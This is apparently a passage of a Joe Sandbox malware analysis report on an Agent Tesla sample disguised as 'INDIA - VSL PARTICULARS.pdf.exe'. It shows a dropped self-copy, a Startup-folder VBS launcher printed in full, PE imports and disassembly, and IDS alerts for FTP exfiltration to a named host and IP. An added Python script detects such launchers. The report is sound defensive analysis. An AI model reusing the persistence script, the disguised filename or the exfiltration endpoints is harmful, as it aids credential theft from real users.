                            Preview:.b.J[RIC@5G6..5B.77QDWTM.7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXR.CD5I).W5.=...E..l._*!.?875;").$W-7Z6.URq6":m9Yc.w.j5=-&j8J<gY5B477Q,G.`|F.,.>.&~8.:.dI=fD.J<..:|%...2.F.;.,{`*K[G.'.a]I. .)fn+In#.1.11!o5.96CY5B477QDWTMP7C<../XRIC.pG6.X1B@.7.DWTMP7CR.OiYYHJD5.7CYM@477QDx.MP7SR8O.YRIC.5G&CY5@472QDWTMP7FR8OJXRIC$1G6GY5..57SDW.MP'CR(OJXRYCD%G6CY5B$77QDWTMP7CR.ZHX.ICD5'4C..C477QDWTMP7CR8OJXRICD5G6CY..57+QDWTMP7CR8OJXRICD5G6CY5B477.IUT.P7CR8OJXRICD.F6.X5B477QDWTMP7CR8OJXRICD5G6CwA'LC7QDO.LP7SR8O.YRIGD5G6CY5B477QDWtMPWm \.>9RI.)5G6.X5BZ77Q.VTMP7CR8OJXRIC.5Gvm=T6U77Q.gTMP.AR8YJXRCAD5G6CY5B477QD.TM..1!J,JXR..E5GVAY5.577qFWTMP7CR8OJXRI.D5.6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR
    Dropped file 2: C:\Users\user\AppData\Local\directory\name.exe (its MD5, SHA1 and SHA-256 are identical to the submitted sample, so it is a byte-for-byte self-copy)
    Process:C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):1285979
    Entropy (8bit):7.497913333541336
    Encrypted:false
    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCVDIxOgo/lTHZQbJ0:7JZoQrbTFZY1iaCVq2Ce
    MD5:6F780B2D3C14A3C9BB7C99C818421EA1
    SHA1:A125C2A8CD2F4D4FBDA4429BDAE54E85EEC396A2
    SHA-256:C7183B75AC8F638031ABBB6BB3EDD5223C626483D5CC82E6B30AE049DE038A00
    SHA-512:73AE354DD618B311A413F23F759B6B56C1F256E631B998BCAD01E2C48621E50FB9900E3F9848D4351F77995B95B1A5A6B686741BAEA844D083C051082460A5A8
    Malicious:true
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 34%
    Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@..........................P................@.......@.........................T.......(............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...(............T..............@..@........................................................................................................................................................................................................................................................................................................................................................
    Dropped file 3: name.vbs, the script that the Autostart entry above runs from the Startup folder
    Process:C:\Users\user\AppData\Local\directory\name.exe
    File Type:data
    Category:dropped
    Size (bytes):274
    Entropy (8bit):3.408374803490271
    Encrypted:false
    SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlDQ1A1z4mA2n
    MD5:86948B136B1F801E8D67F09107FE8579
    SHA1:958A64F475E162FD6B7EE3A5CC11E1D49EF7CF99
    SHA-256:AAE1242E1E0755FD14206D7FF8807311E68529F049AB1A47EA105E405C9494F7
    SHA-512:9572FB2BCBB26BFF379A3ED930BEFECD6BC1A185A8FD5B47E60D7B09A50CD49C8B92569EB9667B0EFE71540232E46BC3D64B8BAB8A5996EAB9CE3625B5E08E4F
    Malicious:true
    Reputation:moderate, very likely benign file
    Preview (UTF-16LE text; the dots in the original preview are its NUL bytes, decoded here):
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run "C:\Users\engineer\AppData\Local\directory\name.exe", 1
    Set WshShell = Nothing
    Note: the script relaunches the self-copy at every logon (the trailing 1 is the WScript.Shell.Run window style, a normal visible window). The embedded path names the profile "engineer", whereas the rest of the report shows the analysis account as "user". The "very likely benign" reputation is a prevalence score for a tiny generic launcher and should not be read as a verdict; the Malicious flag and the Startup-folder location are what matter.
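A Startup-folder .vbs that does nothing but WScript.Shell.Run an executable out of a user-writable directory is the whole persistence mechanism here, and it is cheap to check for at scale. The script below is an added example and not part of the Joe Sandbox report: it decodes the UTF-16LE preview and assesses the script by where it lives and what it launches. The byte layout (UTF-16LE, no BOM, LF line endings) is an assumption, chosen because it matches the NUL pattern in the preview and reproduces the reported size of 274 bytes; the "user-writable path" rule is this example's own heuristic.

```python
"""Decode the UTF-16LE name.vbs shown in the preview and assess what it launches.

Added example, not part of the Joe Sandbox report. The script text is the
preview decoded; the byte layout (UTF-16LE, no BOM, LF line endings) is an
assumption chosen because it matches the preview's NUL pattern and reproduces
the reported size of 274 bytes. The user-writable-path rule is this example's
own heuristic.
"""
import re

VBS_TEXT = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\engineer\\AppData\\Local\\directory\\name.exe", 1\n'
    'Set WshShell = Nothing\n'
)
VBS_BYTES = VBS_TEXT.encode("utf-16-le")   # 274 bytes, as the report states
STARTUP_VBS = (r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu"
               r"\Programs\Startup\name.vbs")            # path from the Autostart entry

RUN_CALL = re.compile(r'\.Run\s+"([^"]+)"', re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents|Temp)\\",
                           re.IGNORECASE)


def decode_script(raw: bytes) -> str:
    """Decode a WSH script stored as UTF-16 (with or without BOM) or 8-bit text."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    # BOM-less UTF-16LE ASCII has a NUL in every odd byte (the dots in the preview)
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def run_targets(script: str) -> list:
    """Paths passed to WScript.Shell.Run."""
    return RUN_CALL.findall(script)


def assess(script_path: str, raw: bytes) -> dict:
    """Flag a Startup-folder script that launches an executable from a user-writable path."""
    script = decode_script(raw)
    targets = run_targets(script)
    in_startup = STARTUP_DIR.search(script_path) is not None
    suspicious = [t for t in targets if USER_WRITABLE.match(t)]
    return {
        "in_startup": in_startup,
        "targets": targets,
        "suspicious_targets": suspicious,
        "verdict": "suspicious" if in_startup and suspicious else "ok",
    }


if __name__ == "__main__":
    print(decode_script(VBS_BYTES))
    print(assess(STARTUP_VBS, VBS_BYTES))
```

Run against the per-user and all-users Startup folders on a fleet, this flags the AppData launcher pattern while leaving a script that starts something under Program Files alone; the decoder matters because tools that grep the raw bytes for ".Run" miss UTF-16 scripts entirely.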
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.497913333541336
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:INDIA - VSL PARTICULARS.pdf.exe
                            File size:1'285'979 bytes
                            MD5:6f780b2d3c14a3c9bb7c99c818421ea1
                            SHA1:a125c2a8cd2f4d4fbda4429bdae54e85eec396a2
                            SHA256:c7183b75ac8f638031abbb6bb3edd5223c626483d5cc82e6b30ae049de038a00
                            SHA512:73ae354dd618b311a413f23f759b6b56c1f256e631b998bcad01e2c48621e50fb9900e3f9848d4351f77995b95b1a5a6b686741baea844d083c051082460a5a8
                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCVDIxOgo/lTHZQbJ0:7JZoQrbTFZY1iaCVq2Ce
                            TLSH:0255F121F5C69036C2B323B19E7EF766963D79360326D1AB37C82D215EA05816B39733
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                            Icon Hash:1733312925935517
                            Entrypoint:0x4165c1
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                            Instruction
                            call 00007FBCB0C52FBBh
                            jmp 00007FBCB0C49E2Eh
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            push edi
                            push esi
                            mov esi, dword ptr [ebp+0Ch]
                            mov ecx, dword ptr [ebp+10h]
                            mov edi, dword ptr [ebp+08h]
                            mov eax, ecx
                            mov edx, ecx
                            add eax, esi
                            cmp edi, esi
                            jbe 00007FBCB0C49FAAh
                            cmp edi, eax
                            jc 00007FBCB0C4A146h
                            cmp ecx, 00000080h
                            jc 00007FBCB0C49FBEh
                            cmp dword ptr [004A9724h], 00000000h
                            je 00007FBCB0C49FB5h
                            push edi
                            push esi
                            and edi, 0Fh
                            and esi, 0Fh
                            cmp edi, esi
                            pop esi
                            pop edi
                            jne 00007FBCB0C49FA7h
                            jmp 00007FBCB0C4A382h
                            test edi, 00000003h
                            jne 00007FBCB0C49FB6h
                            shr ecx, 02h
                            and edx, 03h
                            cmp ecx, 08h
                            jc 00007FBCB0C49FCBh
                            rep movsd
                            jmp dword ptr [00416740h+edx*4]
                            mov eax, edi
                            mov edx, 00000003h
                            sub ecx, 04h
                            jc 00007FBCB0C49FAEh
                            and eax, 03h
                            add ecx, eax
                            jmp dword ptr [00416654h+eax*4]
                            jmp dword ptr [00416750h+ecx*4]
                            nop
                            jmp dword ptr [004166D4h+ecx*4]
                            nop
                            inc cx
                            add byte ptr [eax-4BFFBE9Ah], dl
                            inc cx
                            add byte ptr [ebx], ah
                            ror dword ptr [edx-75F877FAh], 1
                            inc esi
                            add dword ptr [eax+468A0147h], ecx
                            add al, cl
                            jmp 00007FBCB30C27A7h
                            add esi, 03h
                            add edi, 03h
                            cmp ecx, 08h
                            jc 00007FBCB0C49F6Eh
                            rep movsd
                            jmp dword ptr [00000000h+edx*4]
                            Programming Language:
                            • [ C ] VS2010 SP1 build 40219
                            • [C++] VS2010 SP1 build 40219
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [ASM] VS2010 SP1 build 40219
                            • [RES] VS2010 SP1 build 40219
                            • [LNK] VS2010 SP1 build 40219
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974 |
| RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689 |
| RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919 |
| RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474 |
| RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856 |
| RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445 |
| RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021 |
| RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758 |
| RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702 |
| RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9 |
| RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508 |
| RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976 |
| RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713 |
| RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365 |
| RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531 |
| RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186 |
| RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939 |
| RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718 |
| RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581 |
| DLL | Import |
|---|---|
| WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv |
| VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy |
| MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW |
| WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable |
| PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules |
| USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW |
| KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA |
| USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId |
| GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey |
| SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish |
| ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString |
| OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit |
| Language of compilation system | Country where language is spoken |
|---|---|
| English | Great Britain |
| English | United States |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-26T05:34:32.803495+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.6 | 49719 | 50.87.144.157 | 21 | TCP |
| 2024-09-26T05:34:33.314890+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.6 | 49720 | 50.87.144.157 | 35284 | TCP |
| 2024-09-26T05:34:33.321440+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.6 | 49720 | 50.87.144.157 | 35284 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Sep 26, 2024 05:34:08.679580927 CEST | 64348 | 53 | 192.168.2.6 | 1.1.1.1 |
| Sep 26, 2024 05:34:08.695564032 CEST | 53 | 64348 | 1.1.1.1 | 192.168.2.6 |
| Sep 26, 2024 05:34:10.119448900 CEST | 63062 | 53 | 192.168.2.6 | 1.1.1.1 |
| Sep 26, 2024 05:34:10.631589890 CEST | 53 | 63062 | 1.1.1.1 | 192.168.2.6 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Sep 26, 2024 05:34:08.679580927 CEST | 192.168.2.6 | 1.1.1.1 | 0x6206 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 05:34:10.119448900 CEST | 192.168.2.6 | 1.1.1.1 | 0x30df | Standard query (0) | beirutrest.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Sep 26, 2024 05:34:08.695564032 CEST | 1.1.1.1 | 192.168.2.6 | 0x6206 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 05:34:08.695564032 CEST | 1.1.1.1 | 192.168.2.6 | 0x6206 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 05:34:08.695564032 CEST | 1.1.1.1 | 192.168.2.6 | 0x6206 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 05:34:10.631589890 CEST | 1.1.1.1 | 192.168.2.6 | 0x30df | No error (0) | beirutrest.com | | 50.87.144.157 | A (IP address) | IN (0x0001) | false |
                            • api.ipify.org
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
